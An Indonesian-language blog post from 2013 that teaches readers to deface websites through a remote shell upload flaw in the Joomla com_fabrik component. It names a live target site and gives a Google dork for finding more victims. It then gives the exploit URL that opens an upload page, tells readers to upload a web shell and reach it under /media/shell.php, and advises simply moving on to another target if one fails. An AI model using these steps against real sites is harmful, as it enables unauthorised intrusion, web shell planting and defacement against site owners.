Rabu, 17 April 2013

Deface Joomla Component (com_Fabrik) Remote Shell Upload Vulnerability

Live Target:
 http://sercaca.com/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=1&Itemid=0

1. Gunakan Dork untuk mencari Target di Google 

inurl:index.php?option=com_fabrik



 2. Selanjutnya Pilih target sobat, disini ane udah nemu target... langsung aja di eksploitasi :D



3. Masukin exploitnya berikut;
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
maka akan muncul halaman upload seperti gambar berikut:


Note: Kalo tidak muncul halaman seperti gambar atau error, silahkan cari target yg lain! :p

4. upload shell sobat, klik Browse dan pilih shell sobat lalu klik Import CSV



5. Setelah itu lihat hasil upload shell sobat di http://site.com/media/shell.php




 Note: Kalo ga berhasil atau error, cari target lain aja :D

7. Goodluck! :p

Video Tutorial >>> LIHAT
Diposting oleh di
Label:

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)